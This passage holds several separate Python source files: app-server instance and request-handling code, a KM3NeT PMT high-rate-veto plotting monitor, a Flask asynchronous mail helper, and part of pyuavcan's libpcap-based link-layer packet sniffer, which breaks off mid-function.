return wsgi_servr.port
@property
def instances(self):
"""A set of all the instances currently in the Module."""
with self._condition:
return set(self._instances)
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
instance_id = inst.instance_id
start_time = time.time()
timeout_time = start_time + self._get_wait_time()
try:
while time.time() < timeout_time:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
pass
if inst.has_quit:
return self._error_response(environ, start_response, 503)
with self._condition:
if self._instance_running[instance_id]:
should_start = False
else:
self._instance_running[instance_id] = True
should_start = True
if should_start:
self._start_instance(instance_id)
else:
inst.wait(timeout_time)
else:
return self._error_response(environ, start_response, 503)
finally:
with self._condition:
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
if self._module_configuration.is_backend:
environ['BACKEND_ID'] = self._module_configuration.module_name
else:
environ['BACKEND_ID'] = (
self._module_configuration.version_id.split('.', 1)[0])
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
start_time = time.time()
timeout_time = start_time + self._get_wait_time()
while time.time() < timeout_time:
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
if inst:
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
self._condition.notify()
else:
return self._error_response(environ, start_response, 503, _TIMEOUT_HTML)
def _start_any_instance(self):
"""Choose an inactive instance and start it asynchronously.
Returns:
An instance.Instance that will be started asynchronously or None if all
instances are already running.
"""
with self._condition:
for instance_id, running in enumerate(self._instance_running):
if not running:
self._instance_running[instance_id] = True
inst = self._instances[instance_id]
break
else:
return None
self._async_start_instance(instance_id)
return inst
def _async_start_instance(self, instance_id):
return _THREAD_POOL.submit(self._start_instance, instance_id)
def _start_instance(self, instance_id):
with self._condition:
if self._quit_event.is_set():
return
wsgi_servr = self._wsgi_servers[instance_id]
inst = self._instances[instance_id]
if inst.start():
logging.debug('Started instance: %s at http://%s:%s', inst, self.host,
wsgi_servr.port)
try:
environ = self.build_request_environ(
'GET', '/_ah/start', [], '', '0.1.0.3', wsgi_servr.port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
logging.debug('Sent start request: %s', inst)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except:
logging.exception('Internal error while handling start request.')
def _choose_instance(self, timeout_time):
"""Returns an Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time and not self._quit_event.is_set():
for inst in self._instances:
if inst.can_accept_requests:
return inst
else:
inst = self._start_any_instance()
if inst:
break
self._condition.wait(timeout_time - time.time())
else:
return None
if inst:
inst.wait(timeout_time)
return inst
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._module_configuration.check_for_updates()
file_changes = self._watcher.changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if file_changes:
self._instance_factory.files_changed()
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES or file_changes:
self.restart()
def _loop_watching_for_changes_and_idle_instances(self):
"""Loops until the InstancePool is done watching for file changes."""
while not self._quit_event.is_set():
if self.ready:
self._shutdown_idle_instances()
if self._automatic_restarts:
self._handle_changes()
self._quit_event.wait(timeout=1)
def _shutdown_idle_instances(self):
instances_to_stop = []
with self._condition:
for instance_id, inst in enumerate(self._instances):
if (self._instance_running[instance_id] and
inst.idle_seconds > self._instance_idle_timeout):
instances_to_stop.append((self._instances[instance_id],
self._wsgi_servers[instance_id]))
self._instance_running[instance_id] = False
new_instance = self._instance_factory.new_instance(
instance_id, expect_ready_request=True)
self._instances[instance_id] = new_instance
wsgi_servr = self._wsgi_servers[instance_id]
wsgi_servr.set_app(
functools.partial(self._handle_request, inst=new_instance))
self._port_registry.add(wsgi_servr.port, self, new_instance)
for inst, wsgi_servr in instances_to_stop:
logging.debug('Shutting down %r', inst)
self._stop_instance(inst, wsgi_servr)
def _stop_instance(self, inst, wsgi_servr):
inst.quit(expect_shutdown=True)
self._async_shutdown_instance(inst, wsgi_servr.port)
def restart(self):
"""Restarts the module, replacing all running instances."""
instances_to_stop = []
instances_to_start = []
with self._condition:
if self._quit_event.is_set():
return
for instance_id, inst in enumerate(self._instances):
if self._instance_running[instance_id]:
instances_to_stop.append((inst, self._wsgi_servers[instance_id]))
new_instance = self._instance_factory.new_instance(
instance_id, expect_ready_request=True)
self._instances[instance_id] = new_instance
instances_to_start.append(instance_id)
wsgi_servr = self._wsgi_servers[instance_id]
wsgi_servr.set_app(
functools.partial(self._handle_request, inst=new_instance))
self._port_registry.add(wsgi_servr.port, self, new_instance)
for instance_id in instances_to_start:
self._async_start_instance(instance_id)
for inst, wsgi_servr in instances_to_stop:
self._stop_instance(inst, wsgi_servr)
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
try:
with self._condition:
return self._instances[int(instance_id)]
except (ValueError, IndexError):
raise request_info.InvalidInstanceIdError()
def __call__(self, environ, start_response, inst=None):
return self._handle_request(environ, start_response, inst)
@property
def supports_individually_addressable_instances(self):
return True
class InteractiveCommandModule(Module):
"""A Module that can evaluate user commands.
This module manages a single Instance which is started lazily.
"""
_MAX_REQUEST_WAIT_TIME = 15
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
java_config,
cloud_sql_config,
vm_config,
default_version_port,
port_registry,
request_data,
dispatcher,
use_mtime_file_watcher,
allow_skipped_files,
threadsafe_override):
"""Initializer for InteractiveCommandModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for this module.
host: A string containing the host that will be used when constructing
HTTP headers sent to the Instance executing the interactive command
e.g. "localhost".
balanced_port: An int specifying the port that will be used when
constructing HTTP headers sent to the Instance executing the
          interactive command.
api_host: The host that APIServer listens for RPC requests on.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
      runtime_stderr_loglevel: An int representing the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
      php_config: A runtime_config_pb2.PhpConfig instance containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are used.
java_config: A runtime_config_pb2.JavaConfig instance containing
Java runtime-specific configuration. If None then defaults are used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
vm_config: A runtime_config_pb2.VMConfig instance containing
VM runtime-specific configuration. If None all docker-related stuff
is disabled.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(InteractiveCommandModule, self).__init__(
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
java_config,
cloud_sql_config,
vm_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances=1,
use_mtime_file_watcher=use_mtime_file_watcher,
automatic_restarts=True,
allow_skipped_files=allow_skipped_files,
threadsafe_override=threadsafe_override)
# Use a single instance so that state is consistent across requests.
self._inst_lock = threading.Lock()
self._inst = None
@property
def balanced_port(self):
"""The port that the balanced HTTP server for the Module is listening on.
The InteractiveCommandModule does not actually listen on this port but it is
    used when constructing the "SERVER_PORT" value in the WSGI environment.
"""
return self._balanced_port
def quit(self):
"""Stops the InteractiveCommandModule."""
if self._inst:
self._inst.quit(force=True)
self._inst = None
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.INTERACTIVE_REQUEST):
"""Handles a interactive request by forwarding it to the managed Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants. This must be instance.INTERACTIVE_REQUEST.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
assert inst is None
assert request_type == instance.INTERACTIVE_REQUEST
start_time = time.time()
timeout_time = start_time + self._get_wait_time()
while time.time() < timeout_time:
new_instance = False
with self._inst_lock:
if not self._inst:
self._inst = self._instance_factory.new_instance(
AutoScalingModule.generate_instance_id(),
expect_ready_request=False)
new_instance = True
inst = self._inst
if new_instance:
self._inst.start()
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
inst.wait(timeout_time)
except Exception:
# If the instance is restarted while handling a request then the
        # exception raised is unpredictable.
if inst != self._inst:
start_response('503 Service Unavailable', [])
return ['Instance was restarted while executing command']
logging.exception('Unexpected exception handling command: %r', environ)
raise
else:
start_response('503 Service Unavailable', [])
      return ['The command timed out while waiting for another one to complete']
def restart(self):
"""Restarts the module."""
with self._inst_lock:
if self._inst:
self._inst.quit(force=True)
self._inst = None
def send_interactive_command(self, command):
"""Sends an interactive command to the module.
Args:
command: The command to send e.g. "print 5+5".
Returns:
A string representing the result of the command e.g. "10\n".
Raises:
InteractiveCommandError: if the command failed for any reason.
"""
start_response = start_response_utils.CapturingStartResponse()
# 192.0.2.0 is an example address defined in RFC 5737.
environ = self.build_request_environ(
'POST', '/', [], command, '192.0.2.0', self.balanced_port)
try:
response = self._handle_request(
environ,
start_response,
request_type=instance.INTERACTIVE_REQUEST)
except Exception as e:
      raise InteractiveCommandError('Unexpected command failure: ' + str(e))
if start_response.status != '200 OK':
raise InteractiveCommandError(start_response.merged_response(response))
return start_response.merged_response(response)
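# A minimal sketch of how an interactive command flows through
# InteractiveCommandModule (the "interactive_module" name is illustrative;
# callers normally obtain the module from the Dispatcher):
#   output = interactive_module.send_interactive_command('print 5+5')
#   # output == '10\n' on success; InteractiveCommandError is raised otherwise.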
|
hrv.py
|
#!/usr/bin/env python
# vim: ts=4 sw=4 et
"""
===========
HRV Monitor
===========
The following script checks the high-rate-veto for each PMT.
"""
# Author: Tamas Gal <tgal@km3net.de>
# License: MIT
from datetime import datetime
import io
from collections import defaultdict
import threading
import time
import km3pipe as kp
from km3pipe.io.daq import TMCHData
import numpy as np
import matplotlib
matplotlib.use("Agg") # noqa
import matplotlib.pyplot as plt
import km3pipe.style as kpst
kpst.use("km3pipe")
__author__ = "Tamas Gal"
__email__ = "tgal@km3net.de"
VERSION = "1.0"
log = kp.logger.get_logger("HRV")
class PMTRates(kp.Module):
def configure(self):
self.detector = self.require("detector")
self.du = self.require("du")
self.interval = self.get("interval") or 10
self.plot_path = self.get("plot_path") or "km3web/plots/hrv.png"
self.max_x = 800
self.index = 0
self.hrv = defaultdict(list)
self.hrv_matrix = np.full((18 * 31, self.max_x), np.nan)
self.lock = threading.Lock()
self.thread = threading.Thread(target=self.run, args=())
self.thread.daemon = True
self.thread.start()
def run(self):
interval = self.interval
while True:
time.sleep(interval)
now = datetime.now()
self.add_column()
self.update_plot()
with self.lock:
self.hrv = defaultdict(list)
delta_t = (datetime.now() - now).total_seconds()
remaining_t = self.interval - delta_t
print(
"Delta t: {} -> waiting for {}s".format(
delta_t, self.interval - delta_t
)
)
if remaining_t < 0:
log.error(
"Can't keep up with plot production. " "Increase the interval!"
)
interval = 1
else:
interval = remaining_t
def add_column(self):
m = np.roll(self.hrv_matrix, -1, 1)
y_range = 18 * 31
mean_hrv = np.full(y_range, np.nan)
for i in range(y_range):
if i not in self.hrv:
continue
mean_hrv[i] = np.mean(self.hrv[i])
m[:, self.max_x - 1] = mean_hrv
self.hrv_matrix = m
print(self.hrv_matrix)
def update_plot(self):
print("Updating plot at {}".format(self.plot_path))
now = time.time()
max_x = self.max_x
interval = self.interval
def xlabel_func(timestamp):
return datetime.utcfromtimestamp(timestamp).strftime("%H:%M")
m = self.hrv_matrix
fig, ax = plt.subplots(figsize=(10, 6))
ax.imshow(m, origin="lower")
ax.set_title("HRV Ratios for DU-{}\n{}".format(self.du, datetime.utcnow()))
ax.set_xlabel("UTC time [{}s/px]".format(interval))
plt.yticks(
[i * 31 for i in range(18)], ["Floor {}".format(f) for f in range(1, 19)]
)
xtics_int = range(0, max_x, int(max_x / 10))
plt.xticks(
[i for i in xtics_int],
[xlabel_func(now - (max_x - i) * interval) for i in xtics_int],
)
fig.tight_layout()
plt.savefig(self.plot_path)
plt.close("all")
def process(self, blob):
tmch_data = TMCHData(io.BytesIO(blob["CHData"]))
dom_id = tmch_data.dom_id
if dom_id not in self.detector.doms:
return blob
du, floor, _ = self.detector.doms[dom_id]
if du != self.du:
return blob
hrv_flags = reversed("{0:b}".format(tmch_data.hrvbmp).zfill(32))
y_base = (floor - 1) * 31
for channel_id, hrv_flag in enumerate(hrv_flags):
idx = y_base + channel_id
with self.lock:
self.hrv[idx].append(int(hrv_flag))
return blob
def main():
detector = kp.hardware.Detector(det_id=29)
pipe = kp.Pipeline(timeit=True)
pipe.attach(
kp.io.CHPump,
host="192.168.0.110",
port=5553,
tags="IO_MONIT",
timeout=60 * 60 * 24 * 7,
max_queue=1000,
)
pipe.attach(PMTRates, detector=detector, du=2, interval=10)
pipe.drain()
if __name__ == "__main__":
main()
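# A worked example of the HRV bitmap unpacking performed in PMTRates.process()
# (the bitmap value below is made up for illustration):
#   hrvbmp = 0b101                              # channels 0 and 2 have the veto set
#   bits = "{0:b}".format(hrvbmp).zfill(32)     # MSB-first string, padded to 32 bits
#   flags = list(reversed(bits))                # LSB-first: index == channel id
#   flags[0], flags[1], flags[2]  ->  '1', '0', '1'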
|
mails.py
|
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from ablog.extensions import mail
def _send_async_mail(app, message):
with app.app_context():
mail.send(message)
def send_mail(to, subject, template, **kwargs):
message = Message(current_app.config['ABLOG_MAIL_SUBJECT_PREFIX'] + subject, recipients=[to])
message.body = render_template(template + '.txt', **kwargs)
message.html = render_template(template + '.html', **kwargs)
app = current_app._get_current_object()
thr = Thread(target=_send_async_mail, args=[app, message])
thr.start()
return thr
def send_confirm_email(user, token, to=None):
send_mail(subject='Email Confirm', to=to or user.email, template='emails/confirm', user=user, token=token)
def send_reset_password_email(user, token):
send_mail(subject='Password Reset', to=user.email, template='emails/reset_password', user=user, token=token)
def send_change_email_email(user, token, to=None):
send_mail(subject='Change Email Confirm', to=to or user.email, template='emails/change_email', user=user, token=token)
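# A minimal usage sketch (assumes an active Flask request context; the route and
# the generate_confirmation_token() helper are illustrative, not part of ablog):
#   @app.route('/resend-confirmation')
#   def resend_confirmation():
#       token = generate_confirmation_token(current_user)
#       send_confirm_email(user=current_user, token=token)
#       return 'Confirmation mail queued.'
# send_mail() returns the worker Thread, so a caller that must block until the
# message has actually been sent can join() the returned thread.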
|
_link_layer.py
|
# Copyright (c) 2020 UAVCAN Consortium
# This software is distributed under the terms of the MIT License.
# Author: Pavel Kirienko <pavel@uavcan.org>
from __future__ import annotations
import sys
import time
import typing
import ctypes
import socket
import logging
import threading
import dataclasses
import pyuavcan
from pyuavcan.transport import Timestamp
_logger = logging.getLogger(__name__)
class LinkLayerError(pyuavcan.transport.TransportError):
pass
class LinkLayerCaptureError(LinkLayerError):
pass
@dataclasses.dataclass(frozen=True)
class LinkLayerPacket:
"""
The addresses are represented here in the link-native byte order.
"""
protocol: socket.AddressFamily
"""
The protocol encapsulated inside the link-layer packet; e.g., IPv6.
"""
source: memoryview
destination: memoryview
"""
Link-layer addresses, if applicable. If not supported by the link layer, they are to be empty.
"""
payload: memoryview
"""
The packet of the specified protocol.
"""
def __repr__(self) -> str:
"""
The repr displays only the first 100 bytes of the payload.
If the payload is longer, its string representation is appended with an ellipsis.
"""
limit = 100
if len(self.payload) <= limit:
pld = bytes(self.payload).hex()
else:
pld = bytes(self.payload[:limit]).hex() + "..."
return pyuavcan.util.repr_attributes(
self,
protocol=str(self.protocol),
source=bytes(self.source).hex(),
destination=bytes(self.destination).hex(),
payload=pld,
)
Encoder = typing.Callable[["LinkLayerPacket"], typing.Optional[memoryview]]
Decoder = typing.Callable[[memoryview], typing.Optional["LinkLayerPacket"]]
@staticmethod
def get_codecs() -> typing.Dict[int, typing.Tuple[Encoder, Decoder]]:
"""
A factory of paired encode/decode functions that are used for building and parsing link-layer packets.
The pairs are organized into a dict where the key is the data link type code from libpcap;
see https://www.tcpdump.org/linktypes.html.
The dict is ordered such that the recommended data link types come first.
This is useful when setting up packet capture if the adapter supports multiple link layer formats.
The encoder returns None if the encapsulated protocol is not supported by the selected link layer.
The decoder returns None if the packet is not valid or the encapsulated protocol is not supported.
"""
import libpcap as pcap # type: ignore
from socket import AddressFamily
def get_ethernet() -> typing.Tuple[LinkLayerPacket.Encoder, LinkLayerPacket.Decoder]:
# https://en.wikipedia.org/wiki/EtherType
af_to_ethertype = {
AddressFamily.AF_INET: 0x0800,
AddressFamily.AF_INET6: 0x86DD,
}
ethertype_to_af = {v: k for k, v in af_to_ethertype.items()}
def enc(p: LinkLayerPacket) -> typing.Optional[memoryview]:
try:
return memoryview(
b"".join(
(
bytes(p.source).rjust(6, b"\x00")[:6],
bytes(p.destination).rjust(6, b"\x00")[:6],
af_to_ethertype[p.protocol].to_bytes(2, "big"),
p.payload,
)
)
)
except LookupError:
return None
def dec(p: memoryview) -> typing.Optional[LinkLayerPacket]:
if len(p) < 14:
return None
src = p[0:6]
dst = p[6:12]
ethertype = int.from_bytes(p[12:14], "big")
try:
protocol = ethertype_to_af[ethertype]
except LookupError:
return None
return LinkLayerPacket(protocol=protocol, source=src, destination=dst, payload=p[14:])
return enc, dec
def get_loopback(byte_order: str) -> typing.Tuple[LinkLayerPacket.Encoder, LinkLayerPacket.Decoder]:
# DLT_NULL is used by the Windows loopback interface. Info: https://wiki.wireshark.org/NullLoopback
# The source and destination addresses are not representable in this data link layer.
def enc(p: LinkLayerPacket) -> typing.Optional[memoryview]:
return memoryview(b"".join((p.protocol.to_bytes(4, byte_order), p.payload)))
def dec(p: memoryview) -> typing.Optional[LinkLayerPacket]:
if len(p) < 4:
return None
try:
protocol = AddressFamily(int.from_bytes(p[0:4], byte_order))
except ValueError:
return None
empty = memoryview(b"")
return LinkLayerPacket(protocol=protocol, source=empty, destination=empty, payload=p[4:])
return enc, dec
# The output is ORDERED, best option first.
return {
pcap.DLT_EN10MB: get_ethernet(),
pcap.DLT_LOOP: get_loopback("big"),
pcap.DLT_NULL: get_loopback(sys.byteorder),
}
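# A minimal sketch of how the codec table is used during capture setup
# (pd is an activated pcap handle and raw_frame a captured frame; both are
# assumed here for illustration):
#   codecs = LinkLayerPacket.get_codecs()
#   _enc, dec = codecs[pcap.datalink(pd)]      # pick the codec by data link type
#   llp = dec(memoryview(raw_frame))           # None if invalid or unsupported
#   if llp is not None:
#       print(llp.protocol, bytes(llp.source).hex(), len(llp.payload))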
@dataclasses.dataclass(frozen=True)
class LinkLayerCapture:
timestamp: Timestamp
packet: LinkLayerPacket
device_name: str
# Do we also need to report the link layer type here?
class LinkLayerSniffer:
"""
This wrapper is intended to insulate the rest of the transport implementation from the specifics of the
libpcap wrapper implementation (there are dozens of different wrappers out there).
Observe that anything libpcap-related shall not be imported outside of these methods because we only require
this dependency if protocol sniffing capability is needed.
Regular use of the library should be possible without libpcap installed.
Once a new instance is constructed, it is launched immediately.
Execution is carried out in a background daemon thread pool.
It is required to call :meth:`close` when done, which will hint the worker threads to terminate soon.
If a new network device is added or re-initialized while the sniffer is running, it will not be recognized.
Removal or a re-configuration of a device while the sniffer is running may cause it to fail,
which will be logged from the worker threads.
Should a worker thread encounter an error (e.g., if the device becomes unavailable), its capture context
is closed automatically and then the thread is terminated.
Such occurrences are logged at the CRITICAL severity level.
- https://www.tcpdump.org/manpages/pcap.3pcap.html
- https://github.com/karpierz/libpcap/blob/master/tests/capturetest.py
"""
def __init__(self, filter_expression: str, callback: typing.Callable[[LinkLayerCapture], None]) -> None:
"""
:param filter_expression: The standard pcap filter expression;
see https://www.tcpdump.org/manpages/pcap-filter.7.html.
Use Wireshark for testing filter expressions.
:param callback: This callback will be invoked once whenever a packet is captured with a single argument
of type :class:`LinkLayerCapture`.
Notice an important detail: the sniffer takes care of managing the link layer packets.
The user does not need to care which type of data link layer encapsulation is used:
it could be Ethernet, IEEE 802.15.4, or whatever.
The application always gets a high-level view of the data with the link-layer specifics abstracted away.
This function may be invoked directly from a worker thread, so be sure to apply synchronization.
"""
self._filter_expr = str(filter_expression)
self._callback = callback
self._keep_going = True
self._workers: typing.List[threading.Thread] = []
try:
dev_names = _find_devices()
_logger.debug("Capturable network devices: %s", dev_names)
caps = _capture_all(dev_names, filter_expression)
except PermissionError:
if sys.platform.startswith("linux"):
suggestion = f'Run this:\nsudo setcap cap_net_raw+eip "$(readlink -f {sys.executable})"'
elif sys.platform.startswith("win"):
suggestion = "Make sure you have Npcap installed and configured properly: https://nmap.org/npcap"
else:
suggestion = ""
raise PermissionError(
f"You need special privileges to perform low-level network packet capture (sniffing). {suggestion}"
) from None
if not caps:
raise LinkLayerCaptureError(
f"There are no devices available for packet capture at the moment. Evaluated candidates: {dev_names}"
)
self._workers = [
threading.Thread(target=self._thread_worker, name=f"pcap_{name}", args=(name, pd, decoder), daemon=True)
for name, pd, decoder in caps
]
for w in self._workers:
w.start()
assert len(self._workers) > 0
@property
def is_stable(self) -> bool:
"""
True if all devices detected during the initial configuration are still being captured from.
If at least one of them failed (e.g., due to a system reconfiguration), this value would be false.
"""
assert len(self._workers) > 0
return all(x.is_alive() for x in self._workers)
def close(self) -> None:
"""
        After closing, the callback reference is immediately destroyed to prevent the receiver from being kept alive
by the not-yet-terminated worker threads and to prevent residual packets from generating spurious events.
"""
self._keep_going = False
self._callback = lambda *_: None
# This is not a great solution, honestly. Consider improving it later.
# Currently we just unbind the callback from the user-supplied destination and mark that the threads should
# terminate. The sniffer is then left in a locked-in state, where it may keep performing some no-longer-useful
# activities in the background, but they remain invisible to the outside world. Eventually, the instance will
# be disposed after the last worker is terminated, but we should make it more deterministic.
def _thread_worker(self, name: str, pd: object, decoder: LinkLayerPacket.Decoder) -> None:
import libpcap as pcap
assert isinstance(pd, ctypes.POINTER(pcap.pcap_t))
try:
_logger.debug("%r: Worker thread for %r is started: %s", self, name, threading.current_thread())
# noinspection PyTypeChecker
@pcap.pcap_handler # type: ignore
def proxy(_: object, header: ctypes.Structure, packet: typing.Any) -> None:
# Parse the header, extract the timestamp and the packet length.
header = header.contents
ts_ns = (header.ts.tv_sec * 1_000_000 + header.ts.tv_usec) * 1000
ts = Timestamp(system_ns=ts_ns, monotonic_ns=time.monotonic_ns())
length, real_length = header.caplen, header.len
_logger.debug("%r: CAPTURED PACKET ts=%s dev=%r len=%d bytes", self, ts, name, length)
if real_length != length:
# In theory, this should never occur because we use a huge capture buffer.
# On Windows, however, when using Npcap v0.96, the captured length is (always?) reported to be
# 32 bytes shorter than the real length, despite the fact that the packet is not truncated.
_logger.debug(
"%r: Length mismatch in a packet captured from %r: real %r bytes, captured %r bytes",
self,
name,
real_length,
length,
)
# Create a copy of the payload. This is required per the libpcap API contract -- it says that the
# memory is invalidated upon return from the callback.
packet = memoryview(ctypes.cast(packet, ctypes.POINTER(ctypes.c_ubyte * length))[0]).tobytes()
llp = decoder(memoryview(packet))
if llp is None:
if _logger.isEnabledFor(logging.INFO):
_logger.info(
"%r: Link-layer packet of %d bytes captured from %r at %s could not be parsed. "
"The header is: %s",
self,
len(packet),
name,
ts,
packet[:32].hex(),
)
else:
self._callback(LinkLayerCapture(timestamp=ts, packet=llp, device_name=name))
packets_per_batch = 100
while self._keep_going:
err = pcap.dispatch(pd, packets_per_batch, proxy, ctypes.POINTER(ctypes.c_ubyte)())
if err < 0: # Negative values represent errors, otherwise it's the number of packets processed.
if self._keep_going:
_logger.critical(
"%r: Worker thread for %r has failed with error %s; %s",
self,
name,
err,
pcap.geterr(pd).decode(),
)
else:
_logger.debug(
"%r: Error %r in worker thread for %r ignored because it is commanded to stop",
self,
err,
name,
)
break
except Exception as ex:
_logger.exception("%r: Unhandled exception in worker thread for %r; stopping: %r", self, name, ex)
finally:
# BEWARE: pcap_close() is not idempotent! Second close causes a heap corruption. *sigh*
pcap.close(pd)
_logger.debug("%r: Worker thread for %r is being terminated", self, name)
def __repr__(self) -> str:
return pyuavcan.util.repr_attributes(
self,
filter_expression=repr(self._filter_expr),
num_devices=len(self._workers),
            num_devices_active=sum(1 for x in self._workers if x.is_alive()),
)
def _find_devices() -> typing.List[str]:
"""
Returns a list of local network devices that can be captured from.
Raises a PermissionError if the user is suspected to lack the privileges necessary for capture.
We used to filter the devices by address family, but it turned out to be a dysfunctional solution because
a device does not necessarily have to have an address in a particular family to be able to capture packets
of that kind. For instance, on Windows, a virtual network adapter may have no addresses while still being
able to capture packets.
"""
import libpcap as pcap
err_buf = ctypes.create_string_buffer(pcap.PCAP_ERRBUF_SIZE)
devices = ctypes.POINTER(pcap.pcap_if_t)()
if pcap.findalldevs(ctypes.byref(devices), err_buf) != 0:
raise LinkLayerError(f"Could not list network devices: {err_buf.value.decode()}")
if not devices:
# This may seem odd, but libpcap returns an empty list if the user is not allowed to perform capture.
# This is documented in the API docs as follows:
# Note that there may be network devices that cannot be opened by the process calling pcap_findalldevs(),
# because, for example, that process does not have sufficient privileges to open them for capturing;
# if so, those devices will not appear on the list.
raise PermissionError("No capturable devices have been found. Do you have the required privileges?")
dev_names: typing.List[str] = []
d = typing.cast(ctypes.Structure, devices)
while d:
d = d.contents
name = d.name.decode()
if name != "any":
dev_names.append(name)
else:
_logger.debug("Synthetic device %r does not support promiscuous mode, skipping", name)
d = d.next
pcap.freealldevs(devices)
return dev_names
def _capture_all(
device_names: typing.List[str], filter_expression: str
) -> typing.List[typing.Tuple[str, object, LinkLayerPacket.Decoder]]:
"""
Begin capture on all devices in promiscuous mode.
We can't use "any" because libpcap does not support promiscuous mode with it, as stated in the docs and here:
https://github.com/the-tcpdump-group/libpcap/blob/bcca74d2713dc9c0a27992102c469f77bdd8dd1f/pcap-linux.c#L2522.
It shouldn't be a problem because we have our filter expression that is expected to be highly efficient.
Devices whose ifaces are down or that are not usable for other valid reasons will be silently filtered out here.
"""
import libpcap as pcap
codecs = LinkLayerPacket.get_codecs()
caps: typing.List[typing.Tuple[str, object, LinkLayerPacket.Decoder]] = []
try:
for name in device_names:
pd = _capture_single_device(name, filter_expression, list(codecs.keys()))
if pd is None:
_logger.info("Could not set up capture on %r", name)
continue
data_link_type = pcap.datalink(pd)
try:
_, dec = codecs[data_link_type]
except LookupError:
# This is where we filter out devices that certainly have no relevance, like CAN adapters.
pcap.close(pd)
_logger.info(
"Device %r will not be used for packet capture because its data link layer type=%r "
"is not supported by this library. Either the device is irrelevant, "
"or the library needs to be extended to support this link layer protocol.",
name,
data_link_type,
)
else:
caps.append((name, pd, dec))
except Exception:
for _, c, _ in caps:
pcap.close(c)
raise
_logger.info(
"Capture sessions with filter %r have been set up on: %s", filter_expression, list(n for n, _, _ in caps)
)
return caps
def _capture_single_device(
device: str, filter_expression: str, data_link_hints: typing.Sequence[int]
) -> typing.Optional[object]:
"""
Returns None if the interface managed by this device is not up or if it cannot be captured from for other reasons.
On GNU/Linux, some virtual devices (like netfilter devices) can only be accessed by a superuser.
The function will configure libpcap to use the first supported data link type from the list.
If none of the specified data link types are supported, a log message is emitted but no error is raised.
The available link types are listed in https://www.tcpdump.org/linktypes.html.
"""
import libpcap as pcap
def status_to_str(error_code: int) -> str:
"""
Some libpcap-compatible libraries (e.g., WinPCap) do not have this function, so we have to define a fallback.
"""
try:
return str(pcap.statustostr(error_code).decode())
except AttributeError: # pragma: no cover
return f"[error {error_code}]"
# This is helpful: https://github.com/karpierz/libpcap/blob/master/tests/capturetest.py
err_buf = ctypes.create_string_buffer(pcap.PCAP_ERRBUF_SIZE)
pd = pcap.create(device.encode(), err_buf)
if pd is None:
